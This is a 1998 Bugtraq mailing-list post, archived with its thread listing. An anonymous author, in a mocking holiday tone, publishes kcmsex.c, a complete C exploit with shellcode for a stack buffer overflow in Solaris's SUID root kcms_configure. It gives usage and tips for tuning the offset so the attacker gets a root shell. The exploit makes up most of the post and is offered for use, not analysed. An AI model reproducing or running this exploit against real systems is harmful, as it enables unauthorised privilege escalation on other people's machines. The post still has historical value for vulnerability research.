Bugtraq mailing list archives
Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Updated)
From: nobody () REPLAY COM (Anonymous)
Date: Wed, 23 Dec 1998 20:25:54 +0100
On Fri, 18 Dec 1998, Dr. Mudge wrote:
Now let's see... where did we stash those exploits that we were going to give out as stocking stuffers... hrmmm.
While our good friend Mudge rummages about in his bag of Christmas
goodies searching for a tasty snippet, I thought I would offer a small
gift myself, lest I be considered the Grinch who stole Christmas. If
anyone's ever deserved coal in their stockings, it's the readers of this
list! But I digress. Your gift this year? Straight from my kitchen to
your keyboard -- and much better than any fruitcake -- it's ... root on
everyone's favorite OS! What else? Solaris!
It seems Sun's engineers indulged in a little too much "holiday cheer" in
years past, and plumb forgot their good coding practices for privileged
programs. Yes readers, sprintf() and stack buffers in SUID root programs
are a deadly cocktail. This holiday season use a designated coder, and
remember, sprintf() and SUID root don't mix. So go ahead, snuggle up near
a cozy fireplace, smash that UID of yours to 0, and be sure to send Sun a
Christmas card next year. Now wouldn't you much rather have this than
a new pair of socks from your aunt? I knew you did.
Yours truly, ol' Saint Nick himself,
Cheez Whiz
cheezbeast () hotmail com
kcmsex.c (a SPARC exploit is left as an exercise to the reader)
----- cut here ----- cut here ----- cut here ----- cut here -----
/**
*** kcmsex - i386 Solaris root exploit for /usr/openwin/bin/kcms_configure
***
*** Tested and confirmed under Solaris 2.6 i386
***
*** Usage: % kcmsex [offset]
***
*** where offset (if present) is the number of bytes to add to the stack
*** pointer to calculate your target return address; try -1000 to 1000 in
*** increments of 100 for starters. Thanks go to Sun for cranking out
*** such sloppy privileged code. Keep those holes a coming, boys!
***
*** Cheez Whiz
*** cheezbeast () hotmail com
***
*** December 17, 1998
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN 500
#define NOP 0x90
char shell[] =
/* 0 */ "\xeb\x3b" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi */
/* 11 */ "\x31\xc0" /* xor %eax,%eax */
/* 13 */ "\x89\x46\xc1" /* movl %eax,-0x3f(%esi) */
/* 16 */ "\x88\x46\xc6" /* movb %al,-0x3a(%esi) */
/* 19 */ "\x88\x46\x07" /* movb %al,0x7(%esi) */
/* 22 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* setuid: */
/* 25 */ "\x31\xc0" /* xor %eax,%eax */
/* 27 */ "\x50" /* pushl %eax */
/* 28 */ "\xb0\x17" /* movb $0x17,%al */
/* 30 */ "\xe8\xdf\xff\xff\xff" /* call syscall */
/* 35 */ "\x83\xc4\x04" /* addl $0x4,%esp */
/* execve: */
/* 38 */ "\x31\xc0" /* xor %eax,%eax */
/* 40 */ "\x50" /* pushl %eax */
/* 41 */ "\x8d\x5e\x08" /* leal 0x8(%esi),%ebx */
/* 44 */ "\x53" /* pushl %ebx */
/* 45 */ "\x8d\x1e" /* leal (%esi),%ebx */
/* 47 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */
/* 50 */ "\x53" /* pushl %ebx */
/* 51 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 53 */ "\xe8\xc8\xff\xff\xff" /* call syscall */
/* 58 */ "\x83\xc4\x0c" /* addl $0xc,%esp */
/* springboard: */
/* 61 */ "\xe8\xc8\xff\xff\xff" /* call start */
/* data: */
/* 66 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 74 */ "\xff\xff\xff\xff" /* DATA */
/* 78 */ "\xff\xff\xff\xff"; /* DATA */
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;
unsigned long int
get_esp()
{
__asm__("movl %esp,%eax");
}
void
main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop = strtoul(argv[2], NULL, 0);
else
nop = 285;
esp = get_esp();
memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
esp+offset, esp, offset, nop);
execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf,
"foofoo", NULL);
printf("exec failed!\n");
return;
}
Current thread:
- Re: Why you should avoid world-writable directories, (continued)
- Re: Why you should avoid world-writable directories Alan Cox (Dec 22)
- Re: Why you should avoid world-writable directories Casper Dik (Dec 23)
- Re: Why you should avoid world-writable directories Martin Forssen (Dec 23)
- Linux PAM (up to 0.64-2) local root compromise Michal Zalewski (Dec 23)
- Re: Linux PAM (up to 0.64-2) local root compromise Savochkin Andrey Vladimirovich (Dec 24)
- 3COM Documentation backdoors in CB3500 Pedro Ribeiro (Dec 23)
- New perl module Net::RawIP Sergey V. Kolychev (Dec 22)
- Update on Cisco IOS 12.0 security bug John Bashinski (Dec 22)
- Re: New perl module Net::RawIP route () RESENTMENT INFONEXUS COM (Dec 22)
- [SecureXpert Labs Advisory SX-98.12.23-01] Widespread DoS Richard Reiner (Dec 23)
- Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Updated) Anonymous (Dec 23)
- Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Casper Dik (Dec 24)
- Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Dima Volodin (Dec 25)
- Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Lamont Granquist (Dec 28)
- Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Igor Schein (Dec 28)
- Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules Casper Dik (Dec 28)
- A few more fingerprinting techniques - time and netmask David G. Andersen (Dec 28)
- Microsoft Security Bulletin (MS98-020) aleph1 () UNDERGROUND ORG (Dec 23)
- Security Flaw in Cookies Implementation Oliver Lineham (Dec 23)
- Re: Why you should avoid world-writable directories Gonzo Granzeau (Dec 22)
- Re: Why you should avoid world-writable directories Kragen Sitaker (Dec 22)